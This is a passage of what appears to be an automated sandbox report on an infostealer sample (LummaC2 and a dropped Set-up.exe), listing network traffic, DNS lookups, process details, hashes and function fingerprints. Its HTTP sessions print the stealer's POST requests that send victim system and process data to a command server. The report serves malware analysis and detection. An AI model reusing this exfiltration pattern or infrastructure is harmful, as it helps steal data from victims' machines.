Dec 27, 2024 08:56:59.707185984 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:59.708518982 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:56:59.828146935 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 08:57:01.327356100 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 08:57:01.327495098 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 08:57:01.327872038 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:57:01.327956915 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 08:57:01.447468042 CET	80	49739	185.121.15.192	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:56:37.222440958 CET	63642	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:56:37.222498894 CET	63642	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:56:37.359870911 CET	53	63642	1.1.1.1	192.168.2.4
Dec 27, 2024 08:56:37.505760908 CET	53	63642	1.1.1.1	192.168.2.4
Dec 27, 2024 08:56:52.362375021 CET	64861	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:56:52.362421989 CET	64861	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:56:52.503444910 CET	53	64861	1.1.1.1	192.168.2.4
Dec 27, 2024 08:56:52.663135052 CET	53	64861	1.1.1.1	192.168.2.4
Dec 27, 2024 08:56:57.576627016 CET	50701	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:56:57.576654911 CET	50701	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:56:57.717484951 CET	53	50701	1.1.1.1	192.168.2.4
Dec 27, 2024 08:56:57.717499971 CET	53	50701	1.1.1.1	192.168.2.4
Dec 27, 2024 08:56:59.447729111 CET	50703	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:56:59.447783947 CET	50703	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:56:59.586558104 CET	53	50703	1.1.1.1	192.168.2.4
Dec 27, 2024 08:56:59.586796045 CET	53	50703	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 08:56:37.222440958 CET	192.168.2.4	1.1.1.1	0x2c0	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:56:37.222498894 CET	192.168.2.4	1.1.1.1	0xa908	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 27, 2024 08:56:52.362375021 CET	192.168.2.4	1.1.1.1	0x5e25	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:56:52.362421989 CET	192.168.2.4	1.1.1.1	0x4a3	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 08:56:57.576627016 CET	192.168.2.4	1.1.1.1	0x1a71	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:56:57.576654911 CET	192.168.2.4	1.1.1.1	0x75a2	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 08:56:59.447729111 CET	192.168.2.4	1.1.1.1	0xe9be	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:56:59.447783947 CET	192.168.2.4	1.1.1.1	0xb012	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 08:56:37.505760908 CET	1.1.1.1	192.168.2.4	0x2c0	No error (0)	httpbin.org	3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:56:37.505760908 CET	1.1.1.1	192.168.2.4	0x2c0	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:56:52.503444910 CET	1.1.1.1	192.168.2.4	0x5e25	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:56:57.717484951 CET	1.1.1.1	192.168.2.4	0x1a71	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:56:59.586558104 CET	1.1.1.1	192.168.2.4	0xe9be	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	185.121.15.192	80	2364	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:56:52.787847996 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 591460 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 31 34 38 30 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317114807", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 08:56:52.907756090 CET	9888	OUT	Data Raw: 72 66 73 37 53 2b 49 74 53 31 54 34 59 2b 4c 62 62 54 72 72 77 74 34 68 31 47 50 56 39 57 38 53 65 48 37 76 34 62 2b 41 66 47 45 30 2b 6e 58 4d 46 6e 59 51 76 72 4f 6e 36 6a 34 6b 31 52 59 72 47 4b 7a 69 2b 33 36 63 74 76 42 43 48 31 43 32 41 31 Data Ascii: rfs7S+ItS1T4Y+LbbTrrwt4h1GPV9W8SeH7v4b+AfGE0+nXMFnYQvrOn6j4k1RYrGKzi+36ctvBCH1C2A1D8Q54J7WeW2uYZILiCR4poZUaOWKWNirxyIwDK6sCGUgEEV+7+FfjLwV4wZbi8fwpiMZRxGX1vZZjkub0sNhc5wMZNqhiK2GwuLx1CeExSTdDE4bFV6Tkp0akqeIp1KMP5v8Y\/ATxB8Cs3weWcaYXA18LmlD22V8
Dec 27, 2024 08:56:52.907821894 CET	2472	OUT	Data Raw: 54 62 70 75 45 37 53 58 36 42 34 63 5a 4c 6c 75 66 38 54 55 73 76 7a 62 44 66 57 73 48 4c 42 34 75 72 4b 6a 37 61 76 51 76 55 70 51 54 67 33 55 77 31 57 6a 56 58 4b 33 65 79 6d 6b 5c 2f 74 4a 72 51 5c 2f 66 6e 34 53 66 38 41 42 77 33 5c 2f 41 4d Data Ascii: TbpuE7SX6B4cZLluf8TUsvzbDfWsHLB4urKj7avQvUpQTg3Uw1WjVXK3eymk\/tJrQ\/fn4Sf8ABw3\/AMKt+FPwy+GP\/DIX9u\/8K5+H3gzwJ\/bf\/C\/v7M\/tn\/hEPDmm+H\/7V\/s3\/hSmof2f\/aH9n\/a\/sP2+++yed9n+2XPl+c\/oP\/ESt\/1Zb\/5sZ\/8AiIry79hP9mH4Af8ABUL9lHwD8O5vAvgb4R\/G
Dec 27, 2024 08:56:52.907860994 CET	2472	OUT	Data Raw: 4c 39 4b 72 53 52 5c 2f 65 33 5c 2f 41 48 2b 50 54 5c 2f 50 31 78 51 61 6b 50 6f 69 66 38 73 5c 2f 39 56 5c 2f 6e 5c 2f 41 50 56 37 63 55 77 42 32 2b 36 6e 6d 48 36 6b 66 72 55 2b 31 5c 2f 38 41 63 35 5c 2f 31 66 5c 2f 4c 66 70 37 5a 36 31 42 35 Data Ascii: L9KrSR\/e3\/AH+PT\/P1xQakPoif8s\/9V\/n\/APV7cUwB2+6nmH6kfrU+1\/8Ac5\/1f\/Lfp7Z61B5b\/J\/Hj\/I\/T6frmg6A8tP40jT\/AJa9xP0qmy\/N\/sf9NP3Fv\/26duv\/ANerm3938\/5yfz\/P+WOoqHbH8\/8AH5f73uaDsp9fkVix27Pr\/n8OP8mmSt+73v8A9\/P89Ocf4VN\/rP4\/+2f\/ANb+X8q
Dec 27, 2024 08:56:52.907980919 CET	2472	OUT	Data Raw: 52 6f 6e 6c 63 5c 2f 77 43 65 76 4e 45 63 68 6a 32 4f 69 62 50 33 58 6c 63 52 66 76 38 41 48 32 72 38 66 5c 2f 72 35 6f 41 6a 2b 66 7a 4a 70 6b 2b 35 63 66 39 4d 75 50 74 41 36 66 36 4a 32 5c 2f 50 76 54 47 6a 66 35 45 47 66 2b 58 6a 7a 73 5c 2f Data Ascii: Ronlc\/wCevNEchj2OibP3XlcRfv8AH2r8f\/r5oAj+fzJpk+5cf9MuPtA6f6J2\/PvTGjf5EGf+Xjzs\/wCfrx9afJv24\/eP5n7qKSPuP8+360+P959x96f6RLMZOf8APpQdBWkkdJETyd6R\/wCtkk\/z\/wDW\/oyT93Ggf5E\/5+D\/AJ9fen7UkXZ\/qYY\/+ekX+P6+neiON2Z0SHY4\/c\/6z\/PPpx6VPtfOX9fMCH
Dec 27, 2024 08:56:52.908001900 CET	2472	OUT	Data Raw: 71 63 65 45 50 32 6a 56 48 62 78 4a 38 4d 7a 36 5c 2f 65 30 76 78 71 4f 2b 66 37 74 66 7a 74 31 5c 2f 51 35 5c 2f 77 51 35 66 48 68 58 39 6f 38 5a 78 6a 78 42 38 4c 7a 31 78 31 30 37 78 30 50 38 41 32 57 76 35 56 2b 6d 54 4c 6d 38 46 4d 63 72 66 Data Ascii: qceEP2jVHbxJ8Mz6\/e0vxqO+f7tfzt1\/Q5\/wQ5fHhX9o8ZxjxB8Lz1x107x0P8A2Wv5V+mTLm8FMcrf81Hw\/wDhiKr7eR\/af0BW19IXLrf9ErxPsrv\/AHah0P5afif8YPH3xfuPBk\/jrWpNTi+Hvw48DfCnwbYIrQ6foHgv4feHrHw5oenWFpvdIZJ4bJtU1adSG1DWr\/UL9wn2hYo+p\/Z9+OOqfA\/xhqd69rLr\/
Dec 27, 2024 08:56:52.908127069 CET	2472	OUT	Data Raw: 32 45 49 6b 6b 6b 45 5a 2b 79 33 45 41 63 4b 38 6b 6a 4c 76 44 45 46 32 77 51 43 61 5c 2f 41 5c 2f 70 4a 2b 46 66 45 48 6a 48 34 59 59 7a 67 72 68 6e 47 35 50 67 4d 31 72 35 78 6c 47 59 30 36 2b 65 31 38 62 68 73 76 39 6c 67 4b 38 35 31 6f 54 72 Data Ascii: 2EIkkkEZ+y3EAcK8kjLvDEF2wQCa\/A\/pJ+FfEHjH4YYzgrhnG5PgM1r5xlGY06+e18bhsv9lgK851oTrZfgMzxMakoT\/dKOEnGUlyzlBPmX2fAXEeC4W4hpZtj6OKrYaOFxVCUMHClOvzVoJQajWrYem4pr3r1U0ndJtWf2h4I\/4KdeDv2Uv2cf2cfg3+xZ4f8AHuieL\/DfxN034yftQ+NPiDpXh3w9H8XvEWnR2O\/4f6
Dec 27, 2024 08:56:52.908149958 CET	2472	OUT	Data Raw: 2f 77 42 4f 4b 63 50 75 52 5c 2f 38 41 74 54 5c 2f 6a 34 5c 2f 7a 36 30 30 5c 2f 65 64 2b 64 38 66 37 72 7a 50 38 35 50 4a 2b 6c 41 65 31 5c 2f 76 66 68 5c 2f 77 43 44 62 35 62 62 5c 2f 2b 32 55 55 66 2b 66 38 41 50 66 30 71 4c 79 30 6a 5c 2f 63 Data Ascii: /wBOKcPuR\/8AtT\/j4\/z600\/ed+d8f7rzP85PJ+lAe1\/vfh\/wCDb5bb\/+2UUf+f8APf0qLy0j\/cun\/wCrv\/Qf4Vakk++g+fuPMl\/ccf57\/wBKgbZ5nzpK\/wC6Hm\/\/AF+Tj+hrT2fn+H\/BOgZJ5P8AAm\/y\/wDPt6fz9Khk2Nvf7nmSnEnT8v8AJzU21NqfLI756x\/54\/8ArUzrs+T5PN\/dR+v4fh6fpW
Dec 27, 2024 08:56:53.027498960 CET	2472	OUT	Data Raw: 38 41 50 4f 4d 31 45 57 35 2b 5c 2f 73 68 4d 76 37 33 5c 2f 41 4a 34 5a 7a 5c 2f 6e 70 2b 58 70 70 37 50 7a 5c 2f 41 41 5c 2f 34 4a 30 48 37 75 30 56 69 65 4a 4e 65 73 5c 2f 44 47 68 36 6c 72 2b 6f 48 46 6c 70 64 75 62 6d 34 4f 34 4c 69 4d 4f 71 Data Ascii: 8APOM1EW5+\/shMv73\/AJ4Zz\/np+Xpp7Pz\/AA\/4J0H7u0VieJNes\/DGh6lr+oHFlpdubm4O4LiMOqfeIIHLjnBrtvinpGjfCu4+IlpL8V\/g38Q734NfFvw58EPjTpPw31r4kvrHwn+IXi\/TvFepeFtN8U23xL+E3wxstU0\/XE8DeK7S013wLqXjHRItR0aayvb+1e605r34jP8AjjhPhbMMpyviDPMHlWPz2Uo5Vh8V
Dec 27, 2024 08:56:53.027545929 CET	2472	OUT	Data Raw: 61 36 56 70 65 67 66 45 6e 77 52 38 4c 4c 7a 51 37 61 50 34 6f 5c 2f 41 6e 34 61 33 57 71 65 49 70 50 45 76 6a 5c 2f 41 45 57 57 31 46 6a 42 4c 34 65 6b 30 79 47 5c 2f 6d 6c 38 51 77 33 6b 64 70 59 58 76 78 65 53 63 53 5c 2f 52 37 34 66 34 73 34 Data Ascii: a6VpegfEnwR8LLzQ7aP4o\/An4a3WqeIpPEvj\/AEWW1FjBL4ek0yG\/ml8Qw3kdpYXvxeScS\/R74f4s4p454cxeRZVxN4iYHJq3Fud5fgc2wtLiXB8KxxzybOcxcMJHLK\/1elxPXpU+InTjPM8PjMFh6mYYylh8BTo\/T554efSXz\/hXhfgvPsmz7NeG+AsxzPC8KZNjsxyTE1uHsx4sqYOlmWRZfCeYSzShWxNbhinOrw1
Dec 27, 2024 08:56:53.027590990 CET	2472	OUT	Data Raw: 58 69 44 57 76 68 76 34 64 38 56 61 6a 2b 30 7a 6f 58 37 4a 76 67 54 2b 32 66 45 33 69 79 44 54 5c 2f 41 49 71 5c 2f 46 6e 55 50 45 2b 6a 65 46 76 45 78 2b 48 52 74 50 68 33 65 36 74 71 66 67 5c 2f 34 61 33 57 76 36 54 64 2b 50 5c 2f 46 2b 75 61 Data Ascii: XiDWvhv4d8Vaj+0zoX7JvgT+2fE3iyDT\/AIq\/FnUPE+jeFvEx+HRtPh3e6tqfg\/4a3Wv6Td+P\/F+uaP4d0nTVvbfQ9Jk1rxncW3hafa8E\/C7xh8Qf2kv+GUdEk8K2\/wAWk8c634HmfVfEUlp4Mtv7D0q61+fxdP4gTSrjUV8HX3h22j17R9QXw8+p6nYahpkNto7apfwaa31fh9lH0WuE81nxVwFjclwOY4Lh7Ms1lmUe
Dec 27, 2024 08:56:57.547352076 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:56:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	185.121.15.192	80	2364	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:56:57.838398933 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 27, 2024 08:56:59.430083036 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:56:59 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	185.121.15.192	80	2364	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:56:59.708518982 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 08:57:01.327356100 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:57:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	3.218.7.103	443	2364	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:56:39 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-27 07:56:39 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:56:39 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-27 07:56:39 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	02:56:33
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\YrxiR3yCLm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YrxiR3yCLm.exe"
Imagebase:	0x6e0000
File size:	6'213'120 bytes
MD5 hash:	8E9EA8E0E87DDAECDBB57823EAD16033
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:56:35
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\LummaC2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Imagebase:	0x2c0000
File size:	299'520 bytes
MD5 hash:	607000C61FCB5A41B8D511B5ED7625D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	02:56:36
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0x6c0000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Function 05660A08 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

8bq, xrefs: 05660C4F

Memory Dump Source

Source File: 00000000.00000002.1757531210.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5660000_YrxiR3yCLm.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: acfc645e18ce8eb18b16f535ce34035fffc864b619f52b4ff9c6c937ab9b6fe0
Instruction ID: cc32874726a8fbbdfa10dd7dc666039cc1fc8ddbc645a602f7bd8147f1e22cd2
Opcode Fuzzy Hash: acfc645e18ce8eb18b16f535ce34035fffc864b619f52b4ff9c6c937ab9b6fe0
Instruction Fuzzy Hash: 8261C334704201DFCB14EB78D099A29BBA3BB84364B55846AE84AD73A1DF70EC45CB91

Function 05660590 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1757531210.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5660000_YrxiR3yCLm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e688eacd1c43a8c74dee02a56dfb8febb67ceaf88c5ee9a774a8d9f6520202b
Instruction ID: 00b02896f5f7017fc19146dbff705d3bf493efa51fd3c83a653385e8f5f31ca8
Opcode Fuzzy Hash: 4e688eacd1c43a8c74dee02a56dfb8febb67ceaf88c5ee9a774a8d9f6520202b
Instruction Fuzzy Hash: BD515E3490024ACFCB05DFB8E5506AEBFB2FF85309F148569C414A7365EB35594ACB91

Function 05660848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1757531210.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5660000_YrxiR3yCLm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13685fdd1aa8fe10b30677273cd41795c130ddc7603650570a0ff39a1ac95c3c
Instruction ID: bc2d1aef82531e44f19a0cb08b106d4ffb4bad697d096c8bc4eff4b260218c8d
Opcode Fuzzy Hash: 13685fdd1aa8fe10b30677273cd41795c130ddc7603650570a0ff39a1ac95c3c
Instruction Fuzzy Hash: 0C41213490020ADFCB05DFB8E554A9EBBB3FF85308F108569C514A7364EB35694ACF91

Function 05660C90 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1757531210.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5660000_YrxiR3yCLm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4aa10f1a8c6d5d5907aada6bd57c110726641a6882f1680ca0d56a6550f60b
Instruction ID: cfddfeeec329b73a2a79efb2f4bd810e5dfd126f686c9ab61385abcb05162c7e
Opcode Fuzzy Hash: ab4aa10f1a8c6d5d5907aada6bd57c110726641a6882f1680ca0d56a6550f60b
Instruction Fuzzy Hash: 653135357002168BCB00DBADE594ABEBBE6EB84234F148536D81DD7341DB34E946CBD6

Analysis Process: LummaC2.exePID: 4480, Parent PID: 6508COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	60%
Total number of Nodes:	40
Total number of Limit Nodes:	2

Executed Functions

Function 002F5135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

k, xrefs: 002F532B
", xrefs: 002F51F0
$, xrefs: 002F51E2
8, xrefs: 002F51C6
(, xrefs: 002F5236
\, xrefs: 002F5497
&, xrefs: 002F51D4
V, xrefs: 002F5363
W, xrefs: 002F537F
0, xrefs: 002F518E
r, xrefs: 002F53E1
2, xrefs: 002F5180
*, xrefs: 002F5228
F, xrefs: 002F53D3
f, xrefs: 002F54C1
(, xrefs: 002F55F0
^, xrefs: 002F54A5
M, xrefs: 002F5435
4, xrefs: 002F5172
4, xrefs: 002F56DA
w, xrefs: 002F5443
,, xrefs: 002F521A
<, xrefs: 002F51AA
J, xrefs: 002F53EF
G, xrefs: 002F53FD
f, xrefs: 002F54CF
x, xrefs: 002F5419
., xrefs: 002F520C
, xrefs: 002F51FE
*, xrefs: 002F55E8
], xrefs: 002F5347
F, xrefs: 002F56F8
>, xrefs: 002F519C
t, xrefs: 002F5451
, xrefs: 002F54DD
E, xrefs: 002F56F4
D, xrefs: 002F545F
h, xrefs: 002F5489
C, xrefs: 002F540B
R, xrefs: 002F547B
3, xrefs: 002F5427
:, xrefs: 002F51B8
v, xrefs: 002F53A9
M, xrefs: 002F53C5
n, xrefs: 002F54B3
H, xrefs: 002F5156
l, xrefs: 002F5355
i, xrefs: 002F5371
J, xrefs: 002F5148
9, xrefs: 002F546D
{, xrefs: 002F539B
6, xrefs: 002F5164

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: $ $"$$$&$($($*$*$,$.$0$2$3$4$4$6$8$9$:$<$>$C$D$E$F$F$G$H$J$J$M$M$R$V$W$\$]$^$f$f$h$i$k$l$n$r$t$v$w$x${
API String ID: 0-1337114936
Opcode ID: ac19d6f8ee9833bf8ed2a339818605831d7e47d96d0e1987611dd33bc90b6778
Instruction ID: 32c9ac80090cc678604d7b70a9ec89ed25988e7b0155f51aae52b89137c75297
Opcode Fuzzy Hash: ac19d6f8ee9833bf8ed2a339818605831d7e47d96d0e1987611dd33bc90b6778
